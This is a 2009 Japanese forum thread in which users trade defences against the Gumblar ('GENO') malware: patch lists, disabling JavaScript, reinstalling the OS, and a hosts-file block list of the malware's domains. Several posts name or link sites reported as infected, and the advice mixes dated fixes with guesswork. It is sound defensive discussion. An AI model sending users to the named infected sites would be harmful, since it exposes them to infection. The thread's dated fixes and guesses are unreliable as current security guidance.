951 名前:192.168.0.774[sage] 投稿日:2009/05/18(月) 14:44:33 ID:k2CI1leb0
>>945
こんなんでどうだろう。

Vistaでhostsを編集する方法

スタートメニュー→すべてのプログラム→アクセサリ→メモ帳
の上で右クリック

「管理者として実行」を選択

「ファイル」メニュー→「開く」

ファイルの種類を「テキスト文書(*.txt)」から「すべてのファイル(*.*)」に変更

C:\Windows\System32\drivers\etc\hosts
を開く

以下の行を追加し、保存終了
# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn

>>249
エクスプローラを開き、アドレスバーに「C:\Windows\System32\drivers\etc」コピペ→Enter
hostsファイルがあるので、それを右クリック→プロパティということさ☆

261 :192.168.0.774:2009/05/18(月) 21:00:49 ID:4ySopLDi0
>>230 そうなのか。
>>228 そう、このスレをjaneで更新したらavastが反応した。ログに反応する事があるんですね

262 :192.168.0.774:2009/05/18(月) 21:00:52 ID:+psJy0jj0
テンプレの
3.NoScriptの導入(Firefoxの導入)
これがよくないな

263 :192.168.0.774:2009/05/18(月) 21:02:25 ID:FTMobkHsO
そういえばオンラインスキャンって今のところ有効かどうかまだはっきりしてないのかな?
まとめwiki見た感じだとニフティのオンラインスキャンは効果ある…と考えていいのか?

264 :192.168.0.774:2009/05/18(月) 21:02:31 ID:+m52NSIq0
>>262
是非改善案を出してください。

265 :192.168.0.774:2009/05/18(月) 21:02:47 ID:kh9I2kSv0
>>259
PC窓から投げ捨てろ

266 :192.168.0.774:2009/05/18(月) 21:03:16 ID:oH14GReB0
対策法としてWiki貼ってあるサーチ系のサイト多いけど、検体送ろうぜって所は皆無だな

267 :192.168.0.774:2009/05/18(月) 21:03:28 ID:yKeLT0rF0
>>258
乙。手間かけてすまんね。
他のもあるかもしれね。

あともし対応済み確定でもうウイルス出ないなら移動より削除で良いかと
再発あるかもだから1日くらいは置いといた方が良いのかな?

268 :192.168.0.774:2009/05/18(月) 21:04:24 ID:ehqW54OZ0
>>69
これだけど
今の鯖イギリスだよね?

269 :192.168.0.774:2009/05/18(月) 21:04:42 ID:yKeLT0rF0
>>263
亜種が色々あるから効果あるのとないのとある

270 :192.168.0.774:2009/05/18(月) 21:05:21 ID:wU1qChfhP
>>256
>感染PCを起動させてない状態でも該当コード削除後1時間で改ざんされた
GENO恐ろしい子・・・

271 :192.168.0.774:2009/05/18(月) 21:05:22 ID:TM5Ovwjd0
>>266
検体はもう送ってるだろ

272 :192.168.0.774:2009/05/18(月) 21:06:38 ID:+m52NSIq0
こんなに実感が沸かず、そしてじわじわ恐怖感が
煽られるウイルス今までで初めてです。

273 :192.168.0.774:2009/05/18(月) 21:06:49 ID:4I1CdU820
>>260
>>265
有難う…とりあえずそうめん食うよ…


274 :192.168.0.774:2009/05/18(月) 21:07:59 ID:+psJy0jj0
>>265
使用してるブラウザのJSをオフでいいんじゃないの
chromeのことはわからんけど

275 :192.168.0.774:2009/05/18(月) 21:10:33 ID:wU1qChfhP
>>274
同意
hosts は補助的な対策だし、JavaScript 切った方がよっぽど有効

276 :192.168.0.774:2009/05/18(月) 21:11:16 ID:gM07vQcn0
正直感染サイトをブラックリスト化していっても埒あかないわ
PC使う人間が賢くなってJavascript実行しないようにしてくれないと。
この際みんなFirefox+Noscriptにしようぜ
IEなんて窓から投げ捨てろwww

277 :192.168.0.774:2009/05/18(月) 21:11:23 ID:mHe74bNo0
>>268
たどっていくとわかると思うが
その後にイギリスに移動していている事も書いている

278 :192.168.0.774:2009/05/18(月) 21:11:57 ID:+psJy0jj0
>>264と間違えました

279 :192.168.0.774:2009/05/18(月) 21:13:00 ID:mHe74bNo0
>>256
PC起動させてないのに改ざんって普通できないと思うんだが
1分1秒でも起動しているから改ざんされたんだろ

280 :192.168.0.774:2009/05/18(月) 21:13:11 ID:yKeLT0rF0
>>258
リンク集の人ごめん。帰ってきたはキャッシュだった\(^o^)/
本当に申し訳ないです。PC投げ捨ててくるわ……。

281 :192.168.0.774:2009/05/18(月) 21:13:40 ID:4I1CdU820
もしかして自分宛?
IEのJavaスクリプトは切ってる。
あとアクティブなんとかも切ってる。
あと、ファイルをどうたらこうたらで開く?実行する?も無効にした。

そうめんに塩こんぶ入れるとおいしいよ…

282 :192.168.0.774:2009/05/18(月) 21:14:21 ID:TM5Ovwjd0
>>279
FTPのパスだけ抜かれたんだろ

283 :192.168.0.774:2009/05/18(月) 21:14:24 ID:gHdwI20D0

1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.Adobe Acrobat Readerの JavaScript 機能OFF
4.使用しているブラウザのJavaScriptをオフにする。
 (FirefoxならNoscript導入)
5.Windows Updateもやっておく
6.セキュリティ対策ソフトもパターンを最新に更新


こんなもんか?


284 :192.168.0.774:2009/05/18(月) 21:15:39 ID:KxPBQ8Is0
loca.zombie.jpはガチ黒だな

285 :192.168.0.774:2009/05/18(月) 21:16:03 ID:kh9I2kSv0
>>281
VistaならUAC切れなければ大丈夫じゃない?
一応sqlsodbc.chm開けるか確認しといたほうがいいけど

286 :192.168.0.774:2009/05/18(月) 21:16:04 ID:9T8t/wwO0
>>283
キャッシュも一旦全部消す
誤検出→誤報告とか色々ややこしいから、解析とかしようという人でもない限り消すべき

287 :192.168.0.774:2009/05/18(月) 21:16:05 ID:TTbAOLbH0
>>195
今のGENOウイルスって呼び名が、適切じゃないのは分かってるんだけど・・・
素敵すぎる対応でここまで広がる原因とまではいわんけど、きっかけの一つを作ったGENOの名を残してやりたいって感情的な思いがある

288 :192.168.0.774:2009/05/18(月) 21:16:23 ID:FYugBiBP0
Windows 95/98/ME に avast! を導入された方へ

Windows 95/98/ME では、avast! を導入しただけでは、
Webシールドに守られません。

ご使用の全Webブラウザ(2ch専ブラ)ごとに、それぞれの
通信設定で、avast! が通信のプロキシ(代理)サーバーに
なるように自分で設定する必要があります。

avast! を入れても、現在 丸裸 ですから早く設定しましょう。
設定方法は、ヘルプの「Webシールド ― プロバイダの設定」
に書かれています。

avast! を入れて、感染サイトをわざわざ見に行って、
avast! が反応しなかったと書かれていた方、ご愁傷様です。

289 :192.168.0.774:2009/05/18(月) 21:16:32 ID:FTMobkHsO
>>269
そうなのか、ありがとう
とりあえず念のためニフティオンラインスキャンやっておくよ
スキャン中はJS切れないからちょっと不安だがスキャンページとwiki以外見なければ平気かな?

290 :192.168.0.774:2009/05/18(月) 21:16:34 ID:KxPBQ8Is0
って上に書いてたスマン

291 :192.168.0.774:2009/05/18(月) 21:16:37 ID:YyHm/Ikn0
>>283
あぶないIPの遮断は?

292 :192.168.0.774:2009/05/18(月) 21:16:44 ID:mHe74bNo0
>>282
ああ改ざんされたのは鯖のデータか
そりゃPC立ち上げてなくても改ざんされるさw
パス抜かれてるんだから

293 :192.168.0.774:2009/05/18(月) 21:17:01 ID:PdITwA+BO
>>279
お前は何もわかっちゃいないんだな

294 :192.168.0.774:2009/05/18(月) 21:18:54 ID:mHe74bNo0
>>293
携帯からこのスレ見るのは大変だよね

295 :192.168.0.774:2009/05/18(月) 21:20:08 ID:NyMv5pcE0
>>294
末尾0の携帯って始めて見た

296 :192.168.0.774:2009/05/18(月) 21:22:05 ID:iBPeeRKO0
>>295
294は嫌味だろw

297 :192.168.0.774:2009/05/18(月) 21:23:04 ID:ua7Ctj4Z0
>>295
>294は末尾Oの>293に対するコメントでしょ。

298 :192.168.0.774:2009/05/18(月) 21:23:12 ID:+psJy0jj0
>>283
そのほうがFirefoxを入れなくてはいけないという意味に取られなくていいね

できれば
4.使用しているブラウザのJavaScriptをオフにする。
 (FirefoxならNoscript導入が便利)
かな

299 :192.168.0.774:2009/05/18(月) 21:23:46 ID:9T8t/wwO0
>>292
パス抜いた後どっかに送る→そこから改竄という事か
何となく思い込みで改竄も該当PCから裏で行うものと思ってた

300 :192.168.0.774:2009/05/18(月) 21:24:53 ID:gHdwI20D0

◇感染してるっぽい場合
 OSクリーンインストール一択

◇対策
1.Adobe Flash Player の最新版にアップデート
2.Adobe Acrobat Reader の最新版にアップデート
3.Adobe Acrobat Readerの JavaScript 機能OFF
4.使用しているブラウザのJavaScriptをオフにする。
 (FirefoxならNoscript導入が便利)
5.Windows Updateもやっておく
6.セキュリティ対策ソフトもパターンを最新に更新

◇そのほか予防策
・ブラウザのキャッシュをクリアする
・危険IPのブロック
 PeerGuardian2を導入。もしくはhosts書き換え
 ただしPG2は一部FWと競合する場合あり。



>>286 >>291
質問スレ向けのテンプレとしても考えてるから、何かいい案あったらヨロ

>>298
差し替えた


301 :192.168.0.774:2009/05/18(月) 21:25:24 ID:wU1qChfhP
>>292
収集したパスを確実に有効活用してる辺りが恐ろしい
こういう挙動を見ると>>84とか納得しやすい

302 :192.168.0.774:2009/05/18(月) 21:25:43 ID:PdITwA+BO
対策まとめなら、NoScript導入するよりFirefoxで普通にScript切るように書いた方がわかりやすいと思うんだけど

303 :192.168.0.774:2009/05/18(月) 21:26:39 ID:+psJy0jj0
>>300
ありがとう御座います

304 :192.168.0.774:2009/05/18(月) 21:28:27 ID:PdITwA+BO
ダメだ…携帯だと書き込みづらい…
レスが遅れて変な流れになるな
スマン

305 :192.168.0.774:2009/05/18(月) 21:29:50 ID:2oOT4BL40
>>300
個人的には4.のJS OFFをまず最初に持ってきたほうがいいとは思うんだが、
(手軽で効果が高いし)
少なくとも1と5の実行に必要なのが難しいな。
テンプレっぽい対策だと上から順番にやっていくだろうし。

あとはhosts書き換えもツール不要だし
詳細書いて入れておいてもいいんじゃないだろうか。
ドメイン増えてきたらまた考えたほうがいいが。

306 :192.168.0.774:2009/05/18(月) 21:29:58 ID:HJozc/wK0
>>256
その管理人さんの件ですが、検証後こちらのスレで報告してくれるとの事なので
しばらくお待ちください

307 :192.168.0.774:2009/05/18(月) 21:31:20 ID:87c9A7NGO
感染を確認⇒サーバー上のファイルを全消⇒クリーンなPCからお詫び文掲載&FTPのPASS変更⇒感染PCもフル再インストール⇒PCがクリーンであることを確認⇒接続&復旧

の段階を踏んだにもかかわらず、夜中に海外IPからFTPへのログインがあり、
htmlファイルが書き換えられていた。

現在、クリーンインストールをしたPCも、もともとクリーンだったサブPCにも感染の痕跡はない。
これって、一度存在を確認したサーバーを攻撃する特性もあるのだろうか。

308 :192.168.0.774:2009/05/18(月) 21:32:01 ID:I7+FOOqT0
思議だ・・・
このスレの>101
読み込んでもなんの反応もしなかったノートンさまが

無印スレの同じコピペに猛烈に反応してログが読み込まれなくなったww
http://tsushima.2ch.net/test/read.cgi/news/1242643727/


なぜだぁ?

309 :192.168.0.774:2009/05/18(月) 21:32:36 ID:XTSMt63n0
>>287
キャッシュ即消しで無罪になるのは岡ちゃんぐらいだよねぇ( `・ω・)(・ω・` )ねぇ

310 :192.168.0.774:2009/05/18(月) 21:33:48 ID:KxPBQ8Is0
>>307
FTPのパス変えたのにログインされてる時点でクリーンじゃない

311 :192.168.0.774:2009/05/18(月) 21:34:27 ID:UYH62RHM0
感染サイトが書き換えられるのは書き換えロボか何かがクローラーしてて書き換えていくと
思っているのだが、その場合は今のところそいつのドメインは.cnなんだろうか?
注意しててもアンチウィルスにスルーされる亜種発生でいつ感染してもおかしくない状態なら
.htaccessで中国ドメイン弾いておけばサイトからの二次感染を少しは防げるのだろうか…
気付けば即行クリーンインストールしてサイト削除するが気付くまでの時間の二次感染を
防げるものなら防ぎたい

312 :192.168.0.774:2009/05/18(月) 21:37:31 ID:+m52NSIq0
やっぱテンプレは簡潔じゃないと見向きもされないってことが
>>283を見てよくわかったよ。

313 :192.168.0.774:2009/05/18(月) 21:38:00 ID:wU1qChfhP
>>307
さすがにそれはありないだろ。パス変更かリカバリに失敗してるとしか思えない。

314 :192.168.0.774:2009/05/18(月) 21:38:37 ID:9T8t/wwO0
>>311
自前でFTP鯖立てて囮に仕立て上げれば確認出来るんじゃね?

315 :192.168.0.774:2009/05/18(月) 21:39:42 ID:mHe74bNo0
>>311
過去ログみるとわかるが攻撃拠点をどんどん変えているから意味がない
いちおう今の拠点は防いでおいたらどうだ

316 :192.168.0.774:2009/05/18(月) 21:40:24 ID:jMF6q9vz0
>>307
>クリーンなPCからお詫び文掲載&FTPのPASS変更
順序が逆だろ

317 :192.168.0.774:2009/05/18(月) 21:41:17 ID:ua7Ctj4Z0
>>307
そら、感染状態でFTPパス変えて(その時点で抜かれてる)、それからクリーンにしても意味ないわさ。

318 :192.168.0.774:2009/05/18(月) 21:42:29 ID:gHdwI20D0
>>305
順番通りとなると、JSオフでFlashの更新て出来るっけ?

あと質問スレはPC初心者板で考えてたけど、他に適当な板があれば候補挙げてくれ。
ID出る方が便利だろうし、携帯も判別できればいいかも

319 :192.168.0.774:2009/05/18(月) 21:42:42 ID:mHe74bNo0
たしかに感染した状態でパス変えてるw 意味ねぇw

320 :192.168.0.774:2009/05/18(月) 21:44:40 ID:d802Hgw+0
ん?クリーンなPCからパス変更したんじゃなくて?
だとしたらちょっとアホとしかw

321 :192.168.0.774:2009/05/18(月) 21:45:17 ID:trO4EmPM0
>307は
感染PCの他に未感染サブPCも持ってて
FTP変更&お詫び文は未感染サブマシンの方使ったのに
また書き換えられてたってことでは?

322 :192.168.0.774:2009/05/18(月) 21:45:20 ID:uPOxfdVV0
お茶目すぎるww

323 :192.168.0.774:2009/05/18(月) 21:46:07 ID:JmCcr4Q60
>>307
順番が間違ってるな
感染を確認→感染PCをネットから切り離す→クリーンなPCでFTPパス変更、鯖上のファイル撤去、お詫び掲載→
感染PC再インストール→PCがクリーンであることを確認→接続&復旧

324 :192.168.0.774:2009/05/18(月) 21:47:36 ID:5HeIlMf90
しかし、逆に考えてみれば感染してしまったら変更後即クリーンにしても
ばっちり挙動バレてるってことだな、時間差はどれくらいだか不明だけど
恐ろしい

325 :192.168.0.774:2009/05/18(月) 21:48:01 ID:xetX1L+g0
>>311
>思っているのだが、その場合は今のところそいつのドメインは.cnなんだろうか?
そんなわけないだろw
botnet所属のゾンビにやらせてるんだと思うよ

326 :192.168.0.774:2009/05/18(月) 21:49:22 ID:2oOT4BL40
>>318
出来なかったと思うんで、
(手動でWindowsUpdateサイトにいく場合もOFFでは無理だったはず)
とりあえずはその順番が無難かも。

あとは>>251あたりを軽く弄ってhosts書き換えとIP遮断を入れるかどうかかな。
IP遮断はツール必要ならば、無理にテンプレとして書く必要はないだろうけど。

327 :192.168.0.774:2009/05/18(月) 21:50:37 ID:9T8t/wwO0
>>318
> 順番通りとなると、JSオフでFlashの更新て出来るっけ?

今確認してきたが駄目だった
まずJS→その後にActiveX実行だね

328 :307:2009/05/18(月) 21:51:24 ID:87c9A7NGO
いや、だから感染したPCは当然、感染を確認した時点で接続切ってる。
感染していないことを確認した別のPCから、パス変えてお詫び掲載してるんだってば。
じゃなきゃ聞かないよ。

クリーンインストール済みPCの挙動もおかしくないし、sqlsodbc.chmの数値も正常、hosts書き換えも対策済。
カスペルスキーのオンラインスキャンをしても感染警告も出ない。

ちなみにFTPにログインしてきたIPはばらばら。IP検索したらアメリカのものだった。

329 :192.168.0.774:2009/05/18(月) 21:53:24 ID:gHdwI20D0
>>327
じゃあ、こんな感じだな。


◇感染してるっぽい場合
 OSクリーンインストール一択

◇対策
1.Windows Updateをやる
2.Adobe Flash Player の最新版にアップデート
3.Adobe Acrobat Reader の最新版にアップデート
4.Adobe Acrobat Readerの JavaScript 機能OFF
5.使用しているブラウザのJavaScriptをオフにする。
 (FirefoxならNoscript導入が便利)
6.セキュリティ対策ソフトもパターンを最新に更新


◇そのほか予防策
・ブラウザのキャッシュをクリアする
・危険IPのブロック
 PeerGuardian2を導入。もしくはhosts書き換え
 ただしPG2は一部FWと競合する場合あり。


後は感染の確認方法か

330 :192.168.0.774:2009/05/18(月) 21:54:37 ID:9DcOQSDJ0
>>328
ユーザ名がばれてるから辞書アタックとかでpassばれたんじゃね

331 :192.168.0.774:2009/05/18(月) 21:55:17 ID:9T8t/wwO0
>>328
変更後のパスは簡単なもの?
簡単な奴ならあっさり破られた可能性も否定できない

332 :192.168.0.774:2009/05/18(月) 21:56:05 ID:enUpbFMt0
>>328
まさかとは思うがわかりやすい変え方してないだろうな?

333 :192.168.0.774:2009/05/18(月) 21:56:28 ID:wU1qChfhP
>>328
サーバーの方もやられてるとか

334 :192.168.0.774:2009/05/18(月) 21:58:30 ID:uNfu7V1L0
>>328

> 感染していないことを確認した別のPCから、パス変えてお詫び掲載してるんだってば。

実は新種のげのに

335 :192.168.0.774:2009/05/18(月) 21:59:04 ID:wYgtdtbN0
今北産業 しばらく見ないうちに本スレが何故か荒れていたので避難 結局どうなったの? 

336 :192.168.0.774:2009/05/18(月) 22:00:00 ID:k/mLx2jO0
>>281
そうめんに塩こんぶ美味そう…。

Vistaでhosts編集これでどうよ?

C:\Windows\System32\drivers\etc\ を開く
そこにあるhostsをデスクトップにコピペする
コピペしたものをテキストエディタで開いて編集する
編集したhostsを
C:\Windows\System32\drivers\etc\に
コピペで上書きする。

いま自分のVistaで試したら出来たよ。




337 :192.168.0.774:2009/05/18(月) 22:08:03 ID:tEGQgz3YP
>327
直接取りに行くとか
ttp://www.adobe.com/jp/support/kb/ts/228/ts_228685_ja-jp.html
スタンドアローンインストーラーのダウンロード

338 :192.168.0.774:2009/05/18(月) 22:08:47 ID:eOHkXG3n0
6.zlkon-gumblarお役立ち情報 高機能サロン管理システム★さまれぼ!★開発日記
ttp://excomp.cocolog-nifty.com/blog/gumblar.html

猛威を振るっているzlkon.lv/gumblar.cnに関する記事の中で、お役立ち情報を集めました。
他のサイトの引用やパクリではない、独自のノウハウを紹介しています。

339 :192.168.0.774:2009/05/18(月) 22:09:06 ID:ehqW54OZ0
ローカルのhtmlも書き換えられるの?

340 :192.168.0.774:2009/05/18(月) 22:09:54 ID:yaVwoLmK0
>>328
鯖はレンタル?自鯖?
FTPのアクセスエリアに何か仕込まれてるってのが強いと思うんだけど。。。

341 :192.168.0.774:2009/05/18(月) 22:10:32 ID:OKumnmfJ0
>>328
マジで?気になるね。

サーバは、どの程度の権限もってるの?
何か変なプロセス走らせられてるとか。

342 :192.168.0.774:2009/05/18(月) 22:12:12 ID:KxPBQ8Is0
感染していないことを確認した別のPCが感染していたというオチだったりな

343 :192.168.0.774:2009/05/18(月) 22:13:11 ID:Mki2Si4+0
>>287
スペイン風邪みたいなもんか

344 :192.168.0.774:2009/05/18(月) 22:13:46 ID:9T8t/wwO0
>>337
すっかり失念してた

ttp://www.macromedia.com/go/full_flashplayer_win_ie
ttp://www.macromedia.com/go/full_flashplayer_win

直リンだとこれでいいのかな
正直そのページの表記は分かりにくい

345 :192.168.0.774:2009/05/18(月) 22:14:22 ID:/sQ3yN+j0
この勘違い何度も何度も見てるが
「serverとclientは別物」

対策云々結構
解析出来ないならUNIX板あたりでスレ建てなよ
さすがに妄想で広がりつつあるんで口出しさせてもらった
ちなみに俺はセキュ板にいたコボラー
逆asemとか出来ないから↑


346 :192.168.0.774:2009/05/18(月) 22:14:49 ID:OKumnmfJ0
一回FTPパス抜かれたら、サーバ側も色々やられるのかな。
HTML書き換え以外にも。

シェルを書き換えたり、cronで変なプログラム走らせたりとか…

347 :192.168.0.774:2009/05/18(月) 22:16:45 ID:buCstTcZ0
>>345
いまどきCOBOL…

…ができて逆汗できぬとはw


YOUマスターしちゃいなYO!
たぶんやったらすぐできるようになる

348 :192.168.0.774:2009/05/18(月) 22:18:11 ID:mHe74bNo0
鯖にウイルスが常駐していてクリーンPCからパス変えても
それを見ている可能性があるって事かな?
アメリカのIPさらしたら何か手がかり出てこないか?

349 :192.168.0.774:2009/05/18(月) 22:20:51 ID:byWkuqg10
>>343
言いえて妙だな
DOUJINウィルスとか新しい呼称を定着させようとしてる奴もいるっぽいけど
やっぱりGENOの初動ミス(隠蔽?)がパンデミックの原因ってのはデカい

350 :192.168.0.774:2009/05/18(月) 22:21:04 ID:oUUadTlw0
自鯖ならありえるかもしれんが
自鯖じゃなければ権限の関係で常駐はもちろんのこと
cronとか関係ないもの書き換えたりはできないだろ

351 :192.168.0.774:2009/05/18(月) 22:21:19 ID:v9Ml0IBb0
>>345
まぁそうだね。初心者向けにも対策案作るのは素晴らしい事だが
妙な解析から変は誤解広めるのはやめてほしい

>>347
どんどん煽ってくれ
逆汗でまAnubis以上のまともな結果が得られたなら、是非提示してもらおうか

352 :192.168.0.774:2009/05/18(月) 22:21:31 ID:2oOT4BL40
>>346
さすがにそういうものが実行できるようになってるとすると、
鯖側の管理問題だと思うが・・・。自鯖ならわからんけど。

353 :192.168.0.774:2009/05/18(月) 22:21:36 ID:KxPBQ8Is0
>>347
COBOLって結構使われてるよ

354 :192.168.0.774:2009/05/18(月) 22:22:29 ID:oH14GReB0
対策簡単すぎてプログラム板のおさん連中は興味ないんだろうな

355 :192.168.0.774:2009/05/18(月) 22:23:55 ID:oH14GReB0
IDかぶった
354:ID:oH14GReB0はオレ
本物のID:oH14GReB0、オレがID変えてくるからそのままでいいよ

356 :192.168.0.774:2009/05/18(月) 22:24:16 ID:TTbAOLbH0
今日は流れ早いな
他板から人流れてきたのかな

357 :192.168.0.774:2009/05/18(月) 22:24:53 ID:OKumnmfJ0
自鯖なのかレンサバなのか教えて欲しい。

cron 実行出来るレンサバならあるんじゃないかな。
で、ウイルスHTMLを、自働的に上書きするとか。
逆に、レンサバ側から接続させるとか。

358 :192.168.0.774:2009/05/18(月) 22:25:21 ID:gHdwI20D0

◇感染対象
今のところWindows 2000,XP で感染確認

◇感染してるっぽい場合
OSクリーンインストール一択

◇対策
1.Windows Updateをやる
2.使用しているブラウザのJavaScriptをオフにする。
 (FirefoxならNoscript導入が便利)
3.Adobe Flash Player の最新版にアップデート
 IE版     ttp://www.macromedia.com/go/full_flashplayer_win_ie
 その他版  ttp://www.macromedia.com/go/full_flashplayer_win
4.Adobe Acrobat Reader の最新版にアップデート
5.Adobe Acrobat Readerの JavaScript 機能OFFにする
6.セキュリティ対策ソフトもパターンを最新に更新


◇そのほか予防策
・ブラウザのキャッシュをクリアする
・危険IPのブロック
 PeerGuardian2を導入。もしくはhosts書き換え
 ただしPG2は一部FWと競合する場合あり。


◇hosts書き換えの手順

C:\Windows\System32\drivers\etc\ を開く。
そこにある「hosts」というファイルをデスクトップにコピペする
コピペしたものをテキストエディタ(メモ帳でもよい)で開き、以下を最後の行にコピペ

# GENOウイルス対策5月18日
0.0.0.0 zlkon.lv
0.0.0.0 gumblar.cn
0.0.0.0 martuz.cn

終わったら保存して閉じる。
そして編集したファイルを元の場所へ上書きする。

359 :192.168.0.774:2009/05/18(月) 22:26:21 ID:wYgtdtbN0
>>354
むしろそれだけで済むからパソコン弱い人々には安心な件 亜種がちょっと心配だけど

360 :192.168.0.774:2009/05/18(月) 22:27:46 ID:buCstTcZ0
実行DLLは、文字列の難読化はあるが、パッカはかかってない

・検出
>>154

・対策
Driver32 に書き込み権限与えない

>>351 >>353
おいおい、まってくれよ 通じてないじゃん、よくみてくれ
煽りに見せかけて、逆汗やろうぜっていったんじゃねーかよw
COBOL世代なら、CPUってもんががわかるだろうよってことさ

俺のいつもいるスレに現役COBOLerがいるし、
COBOLですっきり記述できるアプリだってある

361 :192.168.0.774:2009/05/18(月) 22:28:12 ID:JmCcr4Q60
>>358
対策の所に

感染してしまってから対策しても無駄です。素直にOS再インストールしてから対策を

ってのはどうだい?

362 :192.168.0.774:2009/05/18(月) 22:30:47 ID:wU1qChfhP
つか普通の対策ってテンプレとまとめサイトで十分だろ

363 :192.168.0.774:2009/05/18(月) 22:33:06 ID:mHe74bNo0
ID:87c9A7NGOはもう寝たのだろうか
鯖は自作鯖かレンタルか
パスは簡単なものや推測しやすい単語かなのか
アクセスしてきたアメリカのIPだけでもいいから教えてくれ

364 :192.168.0.774:2009/05/18(月) 22:34:31 ID:B0vPMVyM0
hostsの書き換えって何の為にやるの?
簡単でいいから説明してよ。

365 :192.168.0.774:2009/05/18(月) 22:34:40 ID:hONTFHMO0
キャッシュのクリアの意味は?
誤検出って、何が誤検出するの?


感染後に消す意味もないけど、
観戦前に消す意味がわからない・・・

366 :192.168.0.774:2009/05/18(月) 22:37:13 ID:gHdwI20D0
>>361
◇対策 ※感染してしまってから対策しても無駄です。素直にOS再インストールしてから対策を

こんな感じか
hosts書き換えは別にするかね

367 :192.168.0.774:2009/05/18(月) 22:37:54 ID:4oFiJRbxO
な、なあ、ここ見てたら、アバストさんにここ感染してるから接続切るね。ていわれたんだが。

368 :192.168.0.774:2009/05/18(月) 22:38:55 ID:yaVwoLmK0
>>364
感染後に.cnサイトへアクセスしないようにする対策。

369 :192.168.0.774:2009/05/18(月) 22:39:00 ID:wU1qChfhP
>>364
危険なドメインを無効にするため(本来の使い方は違うが)
大雑把に言えばFWと同じ効果が得られる
よく話題になるのは設定が楽だから

370 :192.168.0.774:2009/05/18(月) 22:39:00 ID:w4/ZSEyW0
しょーもない質問してるやつ全員ググレよカスが

371 :192.168.0.774:2009/05/18(月) 22:39:39 ID:8wfIRV8X0
winXP3だけど、定期的にCCleaner掛けてるせいか、sqlsodbc.chmそのものが無い。
(HDD内全部検索かけた)
cmd regedit起動問題なし。これは未感染判定でOK?

>>329
対策の「2.3.を実施するにはIEならスクリプト実行する」
オプション設定が必要と注記いるんじゃないかな。




372 :192.168.0.774:2009/05/18(月) 22:40:03 ID:BZ5+cjSr0
>>356
被害が広がっているっていう事の証じゃなければいいけどな・・・
よりにもよってNT5系が集中的に狙われるからこんな事になる。

373 :307:2009/05/18(月) 22:40:41 ID:87c9A7NGO
パスを破られた可能性か・・・
簡単にはしていないつもりだけど、もう一度PCの感染の有無を調べてからもっと複雑にしてみるよ。
だから前回の改ざんから数日の間隔があったのかもしれないし。

ちなみにサーバーはさくらのライト。
IDが変えられないから、狙いをつけられた可能性はある。
ひとつのサーバーにたくさんのユーザーが同居してるからその辺も関係あるのかも?
今は大丈夫なようなので、もう一度自分のPCを確認して、
こまめにFTPログイン履歴の様子をチェックしてみることにします。
ご教示ありがとうございました。

374 :192.168.0.774:2009/05/18(月) 22:41:08 ID:buCstTcZ0
>>365
鯖側が修復しても、閲覧側が、腐ったページデータ(のキャッシュ)を再利用したら
またおかしなファイルを拾ってきてしまうことになると

あとは、証拠隠滅と解釈しるって声が大きいが…。

375 :192.168.0.774:2009/05/18(月) 22:44:01 ID:aSrw/i390
>>373
有料のレンタルならパスバレの可能性が一番でかい気がするな

376 :192.168.0.774:2009/05/18(月) 22:44:31 ID:mHe74bNo0
>>372
セキュリティ板のやつが腐女子がいろんなところで
ウイルスに関して無意味に宣伝していると怒ってたよ

377 :192.168.0.774:2009/05/18(月) 22:45:54 ID:mIWNpElD0
mixi()笑でGENO検索すれば腐女子日記いっぱいだぜwwww

378 :192.168.0.774:2009/05/18(月) 22:46:24 ID:/c603Sfk0
>>371
同じくCClaner常用してるけど、sqlsodbc.chmはあるよ;

379 :192.168.0.774:2009/05/18(月) 22:46:38 ID:wYgtdtbN0
>>376
あら? 俺が聞いた話じゃ腐女子が無意味に逆切れして本スレ荒らしてるんじゃなかったっけ?

380 :192.168.0.774:2009/05/18(月) 22:47:52 ID:mHe74bNo0
>>379
誰に聞いたんだ?

381 :192.168.0.774:2009/05/18(月) 22:48:38 ID:hONTFHMO0
>>374
腐ったページ=ほぼ感染でしょ?
今の対応はクリンインストしかないのなら
意味がないのでは〜

と思ってるんだが・・・

382 :371:2009/05/18(月) 22:49:40 ID:8wfIRV8X0
自己レス、2月にママンCPU他交換したときにnliteで統合、自分に不要な
コンポーネント、サービス削ったので無くなってる可能性大。


383 :192.168.0.774:2009/05/18(月) 22:49:54 ID:9qXYfpxvO
>>369
今の所分かってるGENOの悪さするファイルが0.0.0.0のIPアドレスにしかアクセスできなくするって解釈でいいの?
で、そもそも0.0.0.0ってIPアドレスは存在しないってことでいいのかね、初歩的な知識すら無くてすまん

384 :192.168.0.774:2009/05/18(月) 22:50:45 ID:jPv9twqC0
>>371
nlite で 削ったりしてない?
俺もない口なんだけどね。

385 :192.168.0.774:2009/05/18(月) 22:51:00 ID:wYgtdtbN0
>>380
セキュ板の現行スレより

103 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/05/18(月) 22:12:40
>>95
妙な敬語つかった腐女子が私達は悪くない!とよくわからんが荒らす

コピペ連没

運営に通報

の流れ

386 :192.168.0.774:2009/05/18(月) 22:51:15 ID:eOHkXG3n0

217 名前: カンパニュラ・ベリディフォーリア(dion軍)[] 投稿日:2009/05/18(月) 21:37:49.06 ID:VX5XUvFi
ht p://maarso.blog.shinobi.jp/

おいちょっとこのサイト踏んだら挙動おかしいんだが
ソース見た限りではおかしなところなかったんだが……

387 :192.168.0.774:2009/05/18(月) 22:51:17 ID:wU1qChfhP
>>371
大丈夫だと思う
確か感染するとsqlsodbc.chmは作られるとかどうとか

388 :192.168.0.774:2009/05/18(月) 22:52:11 ID:wbZLj6zq0
>>386
GENOウイルスチェッカー
危険度0%
安全なURLです。踏んでも大丈夫でしょう。
評価ミス報告

389 :192.168.0.774:2009/05/18(月) 22:52:42 ID:gHdwI20D0

◆感染対象
今のところWindows 2000,XP で感染確認

◆感染してるっぽい場合
OSクリーンインストール一択

◆対策 ※感染してしまってから対策しても無駄です。素直にOS再インストールしてから対策を

1.Windows Updateをやる
2.使用しているブラウザのJavaScriptをオフにする。
 (FirefoxならNoscript導入が便利)
3.Adobe Flash Player の最新版にアップデート
 JSオフだと更新できないので↓のリンクからインストーラーを落として入れる
 IE版     ttp://www.macromedia.com/go/full_flashplayer_win_ie
 その他版  ttp://www.macromedia.com/go/full_flashplayer_win
4.Adobe Acrobat Reader の最新版にアップデート
5.Adobe Acrobat Readerの JavaScript 機能OFFにする
6.セキュリティ対策ソフトもパターンを最新に更新


◆そのほか予防策
